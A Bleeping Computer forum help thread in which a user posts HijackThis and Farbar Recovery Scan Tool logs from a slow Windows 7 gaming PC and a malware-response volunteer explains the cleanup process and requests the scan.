HijackThis Log: Please help Diagnose Computer unnecessarily slow at times.


  • This topic is locked
15 replies to this topic

#1 Rainsford

Rainsford

  • Members
  • 21 posts

Posted 09 October 2015 - 08:36 PM

Hello! I have used HijackThis many times in the past but decided I needed to give it another go as my computer seems to be unnecessarily slow for what's inside it. Here is my log and thank you for helping.

 

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 8:35:40 PM, on 10/9/2015
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17496)

FIREFOX: 41.0.1 (x86 en-US)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\Creative\Shared Files\CTSched.exe
C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe
C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe
C:\Windows\SysWOW64\Ctxfihlp.exe
C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe
C:\Windows\SysWOW64\CTXFISPI.EXE
C:\Program Files\Alienware\Command Center\AlienwareAlienFXController.exe
E:\Steam\Steam.exe
C:\Program Files\Alienware\Command Center\AWCCApplicationWatcher32.exe
E:\Steam\bin\steamwebhelper.exe
C:\Program Files\Alienware\Command Center\AlienFusionController.exe
E:\Steam\bin\steamwebhelper.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_19_0_0_185.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_19_0_0_185.exe
C:\Users\Rainsford\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: Search Helper - {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [CTxfiHlp] CTXFIHLP.EXE
O4 - HKLM\..\Run: [Corsair Utility Engine] "C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe" --autorun
O4 - HKCU\..\Run: [Steam] "E:\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [CreativeTaskScheduler] "C:\Program Files (x86)\Creative\Shared Files\CTSched.exe" /logon
O4 - HKCU\..\Run: [Akamai NetSession Interface] "C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe"
O4 - HKCU\..\Run: [Google Update] "C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O16 - DPF: {6C269571-C6D7-4818-BCA4-32A035E8C884} (Creative Software AutoUpdate) - http://ccfiles.creative.com/Web/softwareupdate/su/ocx/15102/CTSUEng.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://files.creative.com/Web/softwareupdate/ocx/150323/CTPID.cab
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Alienware Fusion Service (AlienFusionService) - Alienware - C:\Program Files\Alienware\Command Center\AlienFusionService.exe
O23 - Service: Creative Audio Engine Licensing Service - Creative Labs - C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe
O23 - Service: Creative Audio Service (CTAudSvcService) - Creative Technology Ltd - C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
O23 - Service: EasyAntiCheat - EasyAntiCheat Ltd - C:\Windows\system32\EasyAntiCheat.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: NVIDIA GeForce Experience Service (GfExperienceService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\Windows\system32\GameMon.des.exe (file missing)
O23 - Service: NVIDIA Network Service (NvNetworkService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
O23 - Service: NVIDIA Streamer Service (NvStreamSvc) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 9465 bytes
 




 


#2 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • Gender:Male
  • Location:Germany

Posted 10 October 2015 - 04:14 AM

Hi & welcome to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your Malware related problems.

Before we move on, please read the following points carefully:
  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are following my instructions, stop there and tell me the exact nature of your problem.
  • If you have illegal/cracked software, cracks, keygens, etc. on the system, please remove or uninstall them now!
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
Step 1

Please run a FRST scan. This will help us diagnose your problem.

Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administrator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.

regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer

#3 Rainsford

Rainsford
  • Topic Starter

  • Members
  • 21 posts

Posted 10 October 2015 - 07:40 PM

Hello deeprybka and thank you for assisting me! Here are my logs as per instructed.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-10-2015
Ran by Rainsford (administrator) on PHOTON (10-10-2015 19:35:14)
Running from C:\Users\Rainsford\Desktop
Loaded Profiles: Rainsford (Available Profiles: Rainsford)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Alienware) C:\Program Files\Alienware\Command Center\AWCCServiceController.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Valve Corporation) E:\Steam\Steam.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTSched.exe
(NVIDIA Corporation) C:\Users\Rainsford\AppData\Local\NVIDIA\NvBackend\ApplicationOntology\NvOAWrapperCache.exe
(Akamai Technologies, Inc.) C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\Ctxfihlp.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTxfispi.exe
(Corsair Components, Inc.) C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe
(Alienware) C:\Program Files\Alienware\Command Center\DoorController.exe
(Alienware) C:\Program Files\Alienware\Command Center\AlienwareAlienFXController.exe
(Valve Corporation) E:\Steam\bin\steamwebhelper.exe
(Alienware) C:\Program Files\Alienware\Command Center\ThermalController.exe
(Alienware) C:\Program Files\Alienware\Command Center\AWCCApplicationWatcher32.exe
(Alienware) C:\Program Files\Alienware\Command Center\AWCCApplicationWatcher64.exe
(Alienware) C:\Program Files\Alienware\Command Center\AlienFusionService.exe
(Alienware) C:\Program Files\Alienware\Command Center\AlienFusionController.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [Command Center Controllers] => C:\Program Files\Alienware\Command Center\AWCCStartupOrchestrator.exe [12656 2012-06-18] (Alienware)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2634872 2015-08-26] (NVIDIA Corporation)
HKLM-x32\...\Run: [CTxfiHlp] => CTXFIHLP.EXE
HKLM-x32\...\Run: [Corsair Utility Engine] => C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe [12844864 2015-08-28] (Corsair Components, Inc.)
HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Run: [Steam] => E:\Steam\steam.exe [2900560 2015-10-08] (Valve Corporation)
HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53655680 2015-07-28] (Skype Technologies S.A.)
HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Run: [CreativeTaskScheduler] => C:\Program Files (x86)\Creative\Shared Files\CTSched.exe [53341 2006-11-17] (Creative Technology Ltd)
HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Rainsford\AppData\Local\Akamai\netsession_win.exe [4691384 2015-09-10] (Akamai Technologies, Inc.)
HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Run: [Google Update] => C:\Users\Rainsford\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{A558BC9F-CD7C-4861-8529-F841954FCF5D}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{B7DD6E6B-AEEB-4855-B6EE-98423CF13D93}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKU\S-1-5-21-671774419-928818983-1318283798-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_45\bin\ssv.dll [2015-05-27] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_45\bin\jp2ssv.dll [2015-05-27] (Oracle Corporation)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-07-27] (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15102/CTSUEng.cab
DPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} hxxp://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://files.creative.com/Web/softwareupdate/ocx/150323/CTPID.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)

FireFox:
========
FF ProfilePath: C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default
FF DefaultSearchEngine: Google
FF DefaultSearchEngine.US: Google
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_19_0_0_185.dll [2015-10-02] ()
FF Plugin: @java.com/DTPlugin,version=11.45.2 -> C:\Program Files\Java\jre1.8.0_45\bin\dtplugin\npDeployJava1.dll [2015-05-27] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.45.2 -> C:\Program Files\Java\jre1.8.0_45\bin\plugin2\npjp2.dll [2015-05-27] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_185.dll [2015-10-02] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-25] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-25] (NVIDIA Corporation)
FF Plugin-x32: @ogplanet.com/npOGPPlugin -> C:\Windows\system32\npOGPPlugin.dll [No File]
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @my.com/Games -> C:\Users\Rainsford\AppData\Local\MyComGames\NPMyComDetector.dll [2015-08-24] (My.com, Inc)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @talk.google.com/GoogleTalkPlugin -> C:\Users\Rainsford\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @talk.google.com/O1DPlugin -> C:\Users\Rainsford\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Rainsford\AppData\Local\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-15] (Google Inc.)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Rainsford\AppData\Local\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-15] (Google Inc.)
FF Plugin HKU\S-1-5-21-671774419-928818983-1318283798-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Rainsford\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-20] (Unity Technologies ApS)
FF user.js: detected! => C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\user.js [2013-08-16]
FF Plugin ProgramFiles/Appdata: C:\Users\Rainsford\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Rainsford\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Extension: Cookies Manager+ - C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\Extensions\{bb6bc1bb-f824-4702-90cd-35e2fb24f25d} [2015-05-28]
FF Extension: Fasterfox - C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\Extensions\{c36177c0-224a-11da-8cd6-0800200c9a91}.xpi [2013-07-09]
FF Extension: Adblock Plus - C:\Users\Rainsford\AppData\Roaming\Mozilla\Firefox\Profiles\tvf5cm3j.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-07-09]
FF HKLM-x32\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension => not found

Chrome:
=======
CHR Profile: C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-11-10]
CHR Extension: (Google Docs) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-11-10]
CHR Extension: (Google Drive) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-11-10]
CHR Extension: (YouTube) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-11-10]
CHR Extension: (Google Search) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-11-10]
CHR Extension: (Google Sheets) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-11-10]
CHR Extension: (EditThisCookie) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\fngmhnnpilhplaeedifhccceomclgfbg [2014-11-10]
CHR Extension: (Google Docs Offline) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-08]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-11-10]
CHR Extension: (Gmail) - C:\Users\Rainsford\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-11-10]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2013-09-29] () [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2015-01-13] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [245544 2015-07-07] (EasyAntiCheat Ltd)
S4 GalaxyClientService; C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe [1720888 2015-08-24] (GOG.com)
S4 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6920248 2015-08-26] (GOG.com)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1155192 2015-08-26] (NVIDIA Corporation)
S4 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [5267776 2014-01-22] (INCA Internet Co., Ltd.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1872504 2015-08-26] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [5544568 2015-08-26] (NVIDIA Corporation)
S4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [1931632 2015-04-22] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2015-01-11] ()
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AWOPFilterDriver; C:\Windows\system32\drivers\AWOPFilterDriver.sys [20560 2015-01-29] ()
